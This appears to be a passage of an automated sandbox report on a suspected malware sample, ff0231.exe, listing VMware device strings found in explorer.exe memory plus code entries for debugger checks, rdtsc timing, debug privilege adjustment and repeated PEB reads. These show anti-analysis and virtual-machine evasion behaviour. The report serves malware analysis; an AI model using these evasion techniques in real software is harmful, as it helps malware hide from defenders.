Source: explorer.exe, 00000010.00000000.880892139.0000000006362000.00000004.00000001.sdmp	Binary or memory string: 053bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}A
Source: explorer.exe, 00000010.00000003.880238735.000000000D246000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Bi
Source: explorer.exe, 00000010.00000003.879526346.000000000D246000.00000004.00000001.sdmp	Binary or memory string: 6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B0
Source: explorer.exe, 00000010.00000003.864125879.000000000D60B000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Bm
Source: explorer.exe, 00000005.00000000.718270528.000000000A716000.00000004.00000001.sdmp	Binary or memory string: War&Prod_VMware_SATAa
Source: explorer.exe, 00000010.00000003.879526346.000000000D246000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}B
Source: explorer.exe, 00000010.00000003.879179015.000000000D245000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Bb
Source: explorer.exe, 00000010.00000003.864125879.000000000D60B000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Bf
Source: explorer.exe, 00000010.00000003.861766817.000000000635C000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}BZ
Source: explorer.exe, 00000010.00000003.864125879.000000000D60B000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}<
Source: explorer.exe, 00000010.00000003.872436336.0000000006382000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Users
Source: explorer.exe, 00000010.00000000.880892139.0000000006362000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb
Source: explorer.exe, 00000010.00000003.871211081.0000000006374000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}@
Source: explorer.exe, 00000010.00000003.871531385.0000000006381000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}LocalState
Source: explorer.exe, 00000010.00000003.866681669.00000000063C4000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7j
Source: explorer.exe, 00000010.00000000.880581056.000000000624C000.00000004.00000001.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000010.00000003.871531385.0000000006381000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Be.
Source: explorer.exe, 00000010.00000003.879335481.00000000063FB000.00000004.00000001.sdmp	Binary or memory string: 0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f
Source: explorer.exe, 00000010.00000000.806552019.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000q
Source: explorer.exe, 00000010.00000000.806552019.0000000000AD8000.00000004.00000020.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000010.00000003.866681669.00000000063C4000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}h
Source: explorer.exe, 00000010.00000003.867980328.000000000D678000.00000004.00000001.sdmp	Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Q)
Source: explorer.exe, 00000010.00000000.879501670.0000000005E3D000.00000004.00000001.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
Source: explorer.exe, 00000010.00000000.876652656.0000000004B3D000.00000004.00000001.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000K

Source: C:\Users\user\Desktop\ff0231.exe

Code function: 0_2_10008C65 IsDebuggerPresent,

Source: C:\Users\user\Desktop\ff0231.exe

Code function: 0_2_1000B120 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

Source: C:\Users\user\Desktop\ff0231.exe

Code function: 0_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,

Source: C:\Users\user\Desktop\ff0231.exe

Code function: 0_2_10001000 GetProcessHeap,HeapAlloc,GetUserDefaultLCID,

Source: C:\Users\user\Desktop\ff0231.exe

Code function: 3_2_00409AA0 rdtsc

Source: C:\Users\user\Desktop\ff0231.exe

Process token adjusted: Debug

Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009B9080 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009EF0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009EF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009EF0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A33884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A33884 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009F90AF mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E20A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A4B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A4B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A4B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A4B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A4B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A4B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009B58EC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009B40E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009B40E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009B40E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009DA830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009DA830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009DA830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009DA830 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E002D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A37016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A37016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A37016 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009CB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009CB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009CB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009CB02A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A84015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A84015 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009D0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009D0050 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A72073 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A81074 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A749A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A749A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A749A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A749A4 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A369A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E2990 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009EA185 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A351BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A351BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A351BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A351BE mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009DC182 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E61A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_00A441E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009BB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009BB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009BB1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009B9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009B9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009B9100 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009E513A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009D4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009D4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009D4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009D4120 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009D4120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009DB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009DB944 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009BB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009BB171 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009BC962 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009ED294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009ED294 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\ff0231.exe	Code function: 3_2_009CAAB0 mov eax, dword ptr fs:[00000030h]
